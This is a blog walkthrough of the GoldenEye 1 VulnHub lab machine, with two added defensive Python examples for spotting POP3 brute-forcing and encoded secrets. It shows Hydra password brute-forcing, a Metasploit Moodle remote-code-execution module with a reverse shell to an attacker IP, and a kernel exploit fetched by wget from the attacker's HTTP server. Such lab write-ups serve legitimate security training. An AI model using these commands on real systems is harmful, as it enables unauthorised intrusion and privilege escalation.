GoldenEye: 1 VulnHub Walkthrough


Hello everyone. In this blog I am going to post a walkthrough of GoldenEye 1. This machine is for those who have basic knowledge of and hands-on experience with penetration testing.

You can download the machine here.

Let’s Begin !!

Target IP – 192.168.43.155

Attacker IP – 192.168.43.139

So, Let’s start with scanning

nmap -sC -sV -Pn -p- 192.168.43.155

Ok!! we can see there are 4 ports open.

25- smtp

80- http

55006- ssl/pop3

55007- pop3

Now, Let’s check the website running on port 80.

It says to Navigate to /sev-home/.

Ok, We need to Login.

So, I tried a few default usernames and passwords, but they didn’t work.

I thought of checking the page source.

OK, there is a terminal.js file. Let’s open it.

We can see there is an HTML-encoded password and two usernames.

boris

natalya

Let’s decode the password.

InvincibleHack3r

We got the password .

Let’s try to login on /sev-home/

Username – boris

Password – InvincibleHack3r

We logged in!!

I read the information written on the page.

The last sentence says POP3 is running on a non-default port.

The scan result also shows POP3 running on port 55007.

Let’s Bruteforce on POP3 with the usernames boris and natalya using the tool Hydra.

hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.43.155 -s 55007 pop3

hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -f 192.168.43.155 -s 55007 pop3

We found passwords.

boris – secret1!

natalya – bird
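
From the mail server's side, the Hydra runs above show up as a burst of failed POP3 logins from one address followed by a success. The following is an added example, not part of the original walkthrough: it flags that pattern in constructed log lines. The log line format, the second source address, the threshold and the time window are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not taken from the target VM); the line format is an assumption.
SAMPLE_LOG = "\n".join(
    [f"2024-01-01 10:00:{s:02d} pop3-login: auth failed user=<boris> rip=192.168.43.139"
     for s in range(1, 7)]
    + ["2024-01-01 10:00:07 pop3-login: Login user=<boris> rip=192.168.43.139",
       "2024-01-01 10:05:00 pop3-login: auth failed user=<natalya> rip=192.168.43.20",
       "2024-01-01 10:05:09 pop3-login: Login user=<natalya> rip=192.168.43.20"]
)

LINE_RE = re.compile(
    r"^(\S+ \S+) pop3-login: (auth failed|Login) user=<([^>]*)> rip=(\S+)$")

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag source IPs with >= threshold failed logins inside the window,
    and record accounts that logged in successfully from a flagged IP."""
    failures = defaultdict(list)   # rip -> [(timestamp, user), ...]
    alerts = {}                    # rip -> {"targets": set, "success_after": set}
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        event, user, rip = m.group(2), m.group(3), m.group(4)
        if event == "auth failed":
            # Keep only the failures that are still inside the sliding window.
            failures[rip] = [(t, u) for t, u in failures[rip] if ts - t <= window]
            failures[rip].append((ts, user))
            if len(failures[rip]) >= threshold:
                alert = alerts.setdefault(
                    rip, {"targets": set(), "success_after": set()})
                alert["targets"].update(u for _, u in failures[rip])
        elif rip in alerts:
            # A success from an already-flagged IP suggests a guessed password.
            alerts[rip]["success_after"].add(user)
    return alerts

if __name__ == "__main__":
    for rip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(rip, sorted(info["targets"]), sorted(info["success_after"]))
```

A single mistyped password followed by a normal login, like the second source address in the sample, stays below the threshold and is not flagged.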

Now, Let’s connect to pop3 using the credentials by nc.

nc 192.168.43.155 55007

USER boris

PASS secret1!

LIST

There are 3 messages. Let’s see,

RETR 1

It’s a message from admin to boris.

RETR 2

It’s a message from natalya to boris, saying that natalya can break boris’s codes.

RETR 3

In the 3rd message we can see that the access codes are kept in the root directory. So, we can’t access them from here.

Let’s move to natalya

nc 192.168.43.155 55007

USER natalya

PASS bird

LIST

There are 2 messages. Let’s see,

RETR 1

It’s a message to natalya, saying that she has to stop breaking boris’s codes.

RETR 2

Ok! we got some information here,

username: xenia

password: RCP90rulez!

Domain: severnaya-station.com/gnocertdir

Before opening the domain, we have to point severnaya-station.com to the server IP in /etc/hosts.

echo 192.168.43.155 severnaya-station.com >> /etc/hosts

To check,

cat /etc/hosts

Let’s check in the browser

Now, let’s log in with the credentials we got from natalya’s mail.

username: xenia

password: RCP90rulez!

After logging in, I was exploring and found a chat with another user in messages.

If we read it, it says,

My email username is “doak”.

Let’s bruteforce again with doak as the username on pop3 using hydra.

hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.43.155 -s 55007 pop3

Ok! we got the password “goat“.

Now, let’s connect to pop3 using nc.

nc 192.168.43.155 55007

USER doak

PASS goat

LIST

RETR 1

So, we got the login credentials of doak.

username: dr_doak

password: 4England!

Let’s login,

We logged in as dr_doak.

I was checking every module to find any clue. There is a module called My private files, and there I found a text file, “s3cret.txt”.

I downloaded the file and checked if we can find anything,

So, it says something is located in /dir007key/for-007.jpg

severnaya-station.com/dir007key/for-007.jpg

So, I opened the above URL in the browser.

It’s an image. So I downloaded it and checked,

wget http://severnaya-station.com/dir007key/for-007.jpg

strings for-007.jpg

OK! We can see an encoded string. It’s a base64-encoded string.

eFdpbnRlcjE5OTV4IQ==

Let’s decode it,

We got the plain-text string, and we know it is the admin’s password.

username: admin

password: xWinter1995x!
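
Both the password in terminal.js and the one inside for-007.jpg were only encoded (HTML entities and base64), not protected. The following is an added example, not part of the original walkthrough: a check a site owner could run over files before publishing them, reporting any entity runs or base64 tokens that decode to readable text. The sample inputs are constructed, and the function name and minimum lengths are assumptions.

```python
import base64
import html
import re

# Runs of numeric character references such as &#73;&#110;...
ENTITY_RUN = re.compile(rb"(?:&#\d{2,3};){6,}")
# Base64-looking tokens, starting at a token boundary.
B64_TOKEN = re.compile(rb"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{12,}={0,2}")

def _printable(raw):
    return all(32 <= b < 127 for b in raw)

def find_encoded_strings(data):
    """Return (kind, offset, decoded_text) for encoded strings found in data (bytes)."""
    findings = []
    for m in ENTITY_RUN.finditer(data):
        decoded = html.unescape(m.group().decode("ascii"))
        findings.append(("html-entities", m.start(), decoded))
    for m in B64_TOKEN.finditer(data):
        token = m.group()
        if len(token) % 4:            # valid base64 is a multiple of 4 characters
            continue
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:            # binascii.Error is a ValueError subclass
            continue
        if raw and _printable(raw):   # ignore tokens that decode to binary noise
            findings.append(("base64", m.start(), raw.decode("ascii")))
    return findings

# Constructed samples (not the files from the VM): a JS comment holding an
# entity-encoded string, and JPEG-like bytes with a base64 string embedded.
SAMPLE_JS = (b"// note: password is "
             + "".join(f"&#{ord(c)};" for c in "constructed-pass").encode()
             + b"\nvar x = 1;\n")
SAMPLE_JPEG = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
               + base64.b64encode(b"constructed-secret")
               + b"\x00\xff\xd9")

if __name__ == "__main__":
    for name, blob in (("sample.js", SAMPLE_JS), ("sample.jpg", SAMPLE_JPEG)):
        for kind, offset, text in find_encoded_strings(blob):
            print(f"{name}: {kind} at byte {offset}: {text!r}")
```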

Let’s login,

We logged in as ADMIN.

Now, we should get a shell on our terminal.

I searched for a way to upload a file to get a reverse shell but didn’t find any.

After exploring, I found that the website is running “MOODLE” and found its version.

I checked whether there is any exploit for Moodle 2.2.3 and found that there is a Remote Code Execution vulnerability.

So, I started Metasploit Framework.

msfconsole

use exploit/multi/http/moodle_cmd_exec

show options

set password xWinter1995x!

set rhost severnaya-station.com

set targeturi /gnocertdir

set username admin

set payload cmd/unix/reverse

set lhost 192.168.43.139

set lport 4444

exploit

We got the shell.

Now we have to get root access,

uname -a

So, I got the version details.

I checked for an exploit and found one.

Let’s download it,

and let’s edit the code.

By default it uses gcc; change it to cc, as gcc isn’t working in the shell we got.

Save it and start a Python HTTP server.

python -m SimpleHTTPServer 8080

Now, let’s get the file into the shell we got,

wget http://192.168.43.139:8080/exploit.c

cc exploit.c -o priv

./priv

id

Here, I got the ROOT access.

Writer: Anudeep is Cyber Security Intern at Azure Skynet Solutions Pvt Ltd. You can contact him here.
